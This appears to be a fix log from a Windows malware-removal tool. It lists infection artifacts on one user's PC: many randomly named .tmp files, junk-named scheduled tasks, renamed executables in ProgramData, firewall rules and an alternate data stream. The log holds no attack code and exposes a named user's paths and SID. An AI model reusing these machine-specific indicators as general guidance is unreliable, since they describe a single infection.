Hostetler\AppData\Roaming\Kjvon.z.tmp
2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hc.Ekso.tmp
2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zmabqBm.tmp
2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pddmtsw.tmp
2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\flwKCyx.tmp
2022-03-22 16:19 - 2022-03-23 08:05 - 000003754 _____
C:\WINDOWS\system32\Tasks\asdsdasdjikindasddeyu
2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\GK.xB.H.tmp
2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hHKvy.s.tmp
2022-03-22 14:53 - 2022-03-22 14:53 - 000003770 _____
C:\WINDOWS\system32\Tasks\asdaddddasdadsddasdeyu
2022-03-22 14:53 - 2020-10-14 07:54 - 000452608 _____ (Microsoft Corporation)
C:\ProgramData\timagar.com
2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\xbfAl.r.tmp
2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\DgkIlaH.tmp
2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\rGjizBd.tmp
2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\kawiKkt.tmp
2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\KAJdHsx.tmp
2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\kaampdk.tmp
2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\c.pmfr..tmp
2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FkyDzBg.tmp
2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.yvbevo.tmp
2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CqicpoE.tmp
2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\imec.rK.tmp
2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.wB.u.k.tmp
2022-03-22 10:40 - 2022-03-22 10:40 - 000000000 ____D C:\Users\Karin
Hostetler\AppData\Local\mbam
2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\x.fkmhm.tmp
2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.AInoHs.tmp
2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hHpH.vg.tmp
2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.Fixosu.tmp
2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\As.e.Iq.tmp
2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\u.vBKhg.tmp
2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FHm.CCw.tmp
2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\G.zIGwn.tmp
2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\uebnfhx.tmp
2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FqFql.I.tmp
2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\vowws.H.tmp
2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.BahC.h.tmp
2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zBllBya.tmp
2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\qcmJyrv.tmp
2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\BcvEhIh.tmp
2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hKKAJt..tmp
2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\H.FnrcA.tmp
2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FcfgK.l.tmp
2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\JBAeesf.tmp
2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.yvkw.y.tmp
2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\GyhgfDG.tmp
2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\rGHtFCn.tmp
2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pzvEJ.c.tmp
2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\cxuionk.tmp
2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zatwfvJ.tmp
2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\KaAzBzg.tmp
2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zIBKqww.tmp
2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EAyEynk.tmp
2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\BvqpwdK.tmp
2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\yc.Kam..tmp
2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\cbmkybA.tmp
2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Io..gvn.tmp
2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CrKgBBd.tmp
2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\tgIysyi.tmp
2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EDhbFIz.tmp
2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\nGtAkFz.tmp
2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\vCkilCq.tmp
2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EaBiAea.tmp
2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CisKbHh.tmp
2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.r.ubyg.tmp
2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\migEyFu.tmp
2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.tyCkte.tmp
2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\EygEhJE.tmp
2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Ja.AJly.tmp
2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hgJmzHc.tmp
2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\lfjDy.A.tmp
2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\bwyFtJD.tmp
2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\d.KvBEk.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hGmrugl.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\CFCbraa.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\swhi.Fm.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\GuyFxhj.tmp
2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\zkKIqmK.tmp
2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\oCGeaDq.tmp
2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\iewoixB.tmp
2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ C:\Users\Karin
Hostetler\AppData\Roaming\IvocJvb.tmp
2022-03-21 16:47 - 2022-03-23 08:25 - 000003730 _____
C:\WINDOWS\system32\Tasks\microWord
2022-03-21 15:25 - 2022-03-21 15:25 - 000003768 _____
C:\WINDOWS\system32\Tasks\calendersw
2022-03-21 15:25 - 2020-10-14 07:54 - 000433152 _____ (Microsoft Corporation)
C:\ProgramData\ESETNONU.com
2022-03-21 15:25 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation)
C:\ProgramData\milon.com
2022-03-21 15:24 - 2019-12-07 05:10 - 000013312 _____ (Microsoft Corporation)
C:\ProgramData\ddond.com
2022-03-22 10:34 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.AInoHs.tmp
2022-03-22 05:30 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.BahC.h.tmp
2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.DmrCyx.tmp
2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.EipzDA.tmp
2022-03-22 09:12 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.Fixosu.tmp
2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.gq.eEv.tmp
2022-03-21 19:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.r.ubyg.tmp
2022-03-21 18:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.tyCkte.tmp
2022-03-22 11:11 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.wB.u.k.tmp
2022-03-22 11:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.yvbevo.tmp
2022-03-22 03:44 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\.yvkw.y.tmp
2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\abF.FyJ.tmp
2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\AfKprbo.tmp
2022-03-22 07:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\As.e.Iq.tmp
2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\B.mvKwd.tmp
2022-03-22 04:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\BcvEhIh.tmp
2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\bvcozKc.tmp
2022-03-22 01:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\BvqpwdK.tmp
2022-03-21 18:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\bwyFtJD.tmp
2022-03-22 13:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\c.pmfr..tmp
2022-03-21 23:38 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\cbmkybA.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CFCbraa.tmp
2022-03-21 19:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CisKbHh.tmp
2022-03-22 11:35 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CqicpoE.tmp
2022-03-21 22:16 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\CrKgBBd.tmp
2022-03-22 03:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\cxuionk.tmp
2022-03-21 18:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\d.KvBEk.tmp
2022-03-22 14:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\DgkIlaH.tmp
2022-03-21 20:37 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EaBiAea.tmp
2022-03-22 01:46 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EAyEynk.tmp
2022-03-21 20:54 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EDhbFIz.tmp
2022-03-21 18:32 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\EygEhJE.tmp
2022-03-22 03:51 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FcfgK.l.tmp
2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\fhIqKrG.tmp
2022-03-22 06:28 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FHm.CCw.tmp
2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Fkhvfuv.tmp
2022-03-22 13:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FkyDzBg.tmp
2022-03-22 17:24 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\flwKCyx.tmp
2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FooEDIz.tmp
2022-03-22 05:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\FqFql.I.tmp
2022-03-22 06:28 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\G.zIGwn.tmp
2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\gelfCgB.tmp
2022-03-22 16:02 - 2022-03-22 15:31 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\GK.xB.H.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\GuyFxhj.tmp
2022-03-22 03:05 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\GyhgfDG.tmp
2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\h.dA..r.tmp
2022-03-22 03:51 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\H.FnrcA.tmp
2022-03-22 18:20 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hc.Ekso.tmp
2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hdpl.A..tmp
2022-03-21 18:10 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hgJmzHc.tmp
2022-03-21 17:13 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hGmrugl.tmp
2022-03-22 16:02 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hHKvy.s.tmp
2022-03-22 09:12 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hHpH.vg.tmp
2022-03-22 04:04 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\hKKAJt..tmp
2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\ianksBp.tmp
2022-03-21 16:48 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\iewoixB.tmp
2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\IlxrjIs.tmp
2022-03-22 11:11 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\imec.rK.tmp
2022-03-21 23:38 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Io..gvn.tmp
2022-03-21 16:48 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\IvocJvb.tmp
2022-03-21 18:32 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Ja.AJly.tmp
2022-03-22 03:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\JBAeesf.tmp
2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\jKsc.Db.tmp
2022-03-22 13:18 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\kaampdk.tmp
2022-03-22 02:22 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\KaAzBzg.tmp
2022-03-22 13:18 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\KAJdHsx.tmp
2022-03-22 13:44 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\kawiKkt.tmp
2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\Kjvon.z.tmp
2022-03-21 18:10 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\lfjDy.A.tmp
2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\ljesr.e.tmp
2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\migEyFu.tmp
2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\myciaB..tmp
2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\nGtAkFz.tmp
2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\oCGeaDq.tmp
2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pAsnGil.tmp
2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pddmtsw.tmp
2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pF.Fltn.tmp
2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\pzvEJ.c.tmp
2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\qcmJyrv.tmp
2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\rGHtFCn.tmp
2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\rGjizBd.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\swhi.Fm.tmp
2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\tgIysyi.tmp
2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\u.vBKhg.tmp
2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\uebnfhx.tmp
2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\uhhsnBd.tmp
2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\vacfsmG.tmp
2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\vCkilCq.tmp
2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\vowws.H.tmp
2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\x.fkmhm.tmp
2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\xbfAl.r.tmp
2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\yc.Kam..tmp
2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\ymybaBG.tmp
2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zatwfvJ.tmp
2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zBllBya.tmp
2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zIBKqww.tmp
2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zkKIqmK.tmp
2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin
Hostetler\AppData\Roaming\zmabqBm.tmp
AlternateDataStreams: C:\ProgramData\Temp:AB1A1E3D [742]
SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> DefaultScope
{B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL =
SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 ->
{B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL =
FirewallRules: [UDP Query
User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File
FirewallRules: [TCP Query
User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File
FirewallRules: [UDP Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query
User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File
FirewallRules: [UDP Query
User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File
FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program
files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program
files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program
files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program
files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [TCP Query
User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File
FirewallRules: [UDP Query
User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File
FirewallRules: [TCP Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [UDP Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program
files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program
files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla
firefox\firefox.exe => No File
FirewallRules: [UDP Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program
files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla
firefox\firefox.exe => No File
C:\ProgramData\milon.com
C:\ProgramData\ddond.com
C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision
C:\Users\Karin Hostetler\AppData\Local\mbam
C:\Users\Karin Hostetler\AppData\Local\Temp
C:\ProgramData\Temp
C:\Users\Karin Hostetler\AppData\Roaming\*.tmp
*****************
Restore point was successfully created.
Processes closed successfully.
========================= Folder: C:\Users\Karin
Hostetler\AppData\Local\Microsoft Vision ========================
2022-03-22 13:11 - 2022-03-22 13:11 - 000000000 ____A
[D41D8CD98F00B204E9800998ECF8427E] () C:\Users\Karin
Hostetler\AppData\Local\Microsoft Vision\22-03-2022_13.11.29
